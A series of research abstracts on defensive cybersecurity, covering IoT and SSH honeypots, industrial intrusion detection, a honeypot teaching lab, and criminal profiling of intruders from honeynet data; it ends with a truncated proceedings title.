Towards a Virtual Machine Introspection Based Multi-Service, Multi-Architecture, High-Interaction Honeypot for IOT Devices

Internet of Things (IoT) devices are quickly growing in adoption. The use case for IoT devices runs the gamut from household applications (such as toasters, lighting, and thermostats) to medical, battlefield, or Industrial Control System (ICS) applications that are used in life or death situations. A disturbing trend for IoT devices is that they are not developed with security in mind. This lack of security has led to the creation of massive botnets that are used for nefarious acts. To address these issues, it’s important to have a good understanding of the threat landscape that IoT devices face. A commonly used security control to monitor and gain insight into threats is a honeypot. This research explores the creation of a VMI-based high-interaction honeypot for IoT devices that is capable of monitoring multiple services simultaneously

Security in Process: Detecting Attacks in Industrial Process Data

Due to the fourth industrial revolution, industrial applications make use of the progress in communication and embedded devices. This allows industrial users to increase efficiency and manageability while reducing cost and effort. Furthermore, the fourth industrial revolution, creating the so-called Industry 4.0, opens a variety of novel use and business cases in the industrial environment. However, this progress comes at the cost of an enlarged attack surface of industrial companies. Operational networks that have previously been phyiscally separated from public networks are now connected in order to make use of new communication capabilites. This motivates the need for industrial intrusion detection solutions that are compatible to the long-term operation machines in industry as well as the heterogeneous and fast-changing networks. In this work, process data is analysed. The data is created and monitored on real-world hardware. After a set up phase, attacks are introduced into the systems that influence the process behaviour. A time series-based anomaly detection approach, the Matrix Profiles, are adapted to the specific needs and applied to the intrusion detection. The results indicate an applicability of these methods to detect attacks in the process behaviour. Furthermore, they are easily integrated into existing process environments. Additionally, one-class classifiers One-Class Support Vector Machines and Isolation Forest are applied to the data without a notion of timing. While Matrix Profiles perform well in terms of creating and visualising results, the one-class classifiers perform poorly

A Flexible Laboratory Environment Supporting Honeypot Deployment for Teaching Real-World Cybersecurity Skills

In the practical study of cybersecurity, students benefit greatly from having full control of physical equipment and services. However, this presents far too great a risk to security to be permitted on university campus networks. This paper describes an approach, used successfully at Northumbria University, in which students have control of an off-campus network laboratory, with a dedicated connection to the Internet. The laboratory is flexible enough to allow the teaching of general purpose networking and operating systems courses, while also supporting the teaching of cybersecurity through the safe integration of honeypot devices. In addition, the paper gives an analysis of honeypot architectures and presents two in detail. One of these offers students the opportunity to study cybersecurity attacks and defences at very low cost. It has been developed as a stand-alone device that also can be integrated safely into the laboratory environment for the study of more complex scenarios. The main contributions of this paper are the design and implementation of: an off-campus, physical network laboratory; a small, low-cost, configurable platform for use as a “lightweight” honeypot; and a laboratory-based, multi-user honeypot for large-scale, concurrent, cybersecurity experiments. The paper outlines how the laboratory environment has been successfully deployed within a university setting to support the teaching and learning of cybersecurity. It highlights the type of experiments and projects that have been supported and can be supported in the future

Distributed Analysis of SSH Brute Force and Dictionary Based Attacks

When designing and implementing a new system, one of the most common misuse cases a system administrator or security architect anticipates is the fact that their system will be attacked with brute force and dictionary-based methods. These attack vectors are commonplace and as such, common defenses have been designed to help mitigate a successful attack. However, the common defenses employed are anticipated and mitigated by even the most novice of attackers. In order to better understand that nature and evolution of brute-force and dictionary attacks, research needs to evaluate the progression of the attack vectors as well as new variables to identify the risk of systems. The research that follows is designed to look at brute force and dictionary-based attacks from a geographical standpoint. Specifically, the data gathered will be analyzed to define attack anomalies based on date, time, location, operating system, and attacking clients in order to ascertain if such variables are viable attack indication markers for defense purposes

Computer Criminal Profiling applied to Digital Investigations

This PhD thesis aims to contribute to the Cyber Security body of knowledge and its Computer Forensic field, still in its infancy when comparing with other forensic sciences. With the advancements of computer technology and the proliferation of cyber crime, offenders making use of computers range from state-sponsored cyber squads to organized crime rings; from cyber paedophiles to crypto miners abusing third-party computer resources. Cyber crime is not only impacting the global economy in billions of dollars annually; it is also a life-threatening risk as society is increasingly dependent on critical systems like those in air traffic control, hospitals or connected cars. Achieving cyber attribution is a step towards to identify, deter and prosecute offenders in the cyberspace, a domain among the top priorities for the UK National Security Strategy. However, the rapid evolution of cyber crime may be an unprecedented challenge in the forensic science history. Attempts to keep up with this pace often result in computer forensic practices limited to technical outcomes, like user accounts or IP addresses used by the offenders. Limitations are intensified when the current cyber security skill shortage contrasts with the vastness of digital crime scenes presented by cloud providers and extensive storage capacities or with the wide range of available anonymizing mechanisms. Quite often, offenders are remaining unidentified, unpunished, and unstoppable. As these anonymising mechanisms conceal offenders from a technological perspective, it was considered that they would not offer the same level of concealment from a behavioural standpoint. Therefore, in addition to the analysis of the state-of-theart of cyber crimes and anonymising mechanisms, the literature of traditional crimes and criminal psychology was reviewed, in an attempt to known what traits of human behaviour could be revealed by the evidence at a crime scene and how to recognize them. It was identified that the subdiscipline of criminology called criminal profiling helps providing these answers. Observing its success rate and benefits as a support tool in traditional investigations, it was hypothesized that a similar outcome could be achieved while investigating cyber crimes, providing that a framework could enable digital investigators to apply criminal profiling concepts in digital investigations. 2 Before developing the framework, the scope of this thesis was delimited to a subset of cyber crimes, consisting exclusively of computer intrusions cases. Also, among potential criminal profiling benefits, the reduction of the suspect pool, case linkage and optimization of investigative efforts were included in the scope. A SSH honeypot experiment based on Cowrie was designed and deployed in a public cloud infrastructure. In its first phase, a single honeypot instance was launched, protected by username and password and accepting connection attempts from any Internet address. Users that were able to guess a valid pair of credentials, after a random number of attempts providing strong passwords, were presented to a simple file system, in which all their interactions within the system were recorded and all downloaded attack tools were isolated and securely stored for their posterior analysis. In the second phase of the experiment, the honeypot infrastructure was expanded to a honeynet with 18 (eighteen) nodes, running in a total of 6 (six) geographic regions and making it possible the analysis of additional variables like location of the “victim” system, perceived influence from directory/file structure/contents and resistance levels to password attacks. After a period of approximately 18 (eighteen) months, more than 7 million connection attempts and 12 million authentication attempts were received by the honeynet, where more than 85,000 were able to successfully log into one of the honeynet servers. Offenders were able to interact with the simulated operating systems and their files, while enabling this research to identify behavioural patterns that proved to be useful not only to group offenders, but also to enrich individual offender profiles. Among these behavioural patterns, the choice of which commands and which parameters to run, the basis of the attack on automated versus manual means, the pairs of usernames and passwords that were provided to try to break the honeypot authentication, their response once a command was not successful, their intent on using specific attack tools and the motivation behind it, any level of caution presented and, finally, preferences for naming tools, temporary files or customized ports were some of the most relevant attributes. Based on the collected data set, such attributes successfully make it possible to narrow down the pools of suspects, to link different honeypot breakins to a same offender and to optimize investigative efforts by enabling the researcher to focus the analysis in a reduced area while searching for evidence. 3 In times when cyber security skills shortage is a concerning challenge and where profiling can play a critical role, it is believed that such a structured framework for criminal profiling within cyber investigations can help to make investigation of cyber crimes quicker, cheaper and more effective

Proceedings of the 2nd Conference on Production Systems and Logistics (CPSL 2021)

Proceedings of the CPSL 202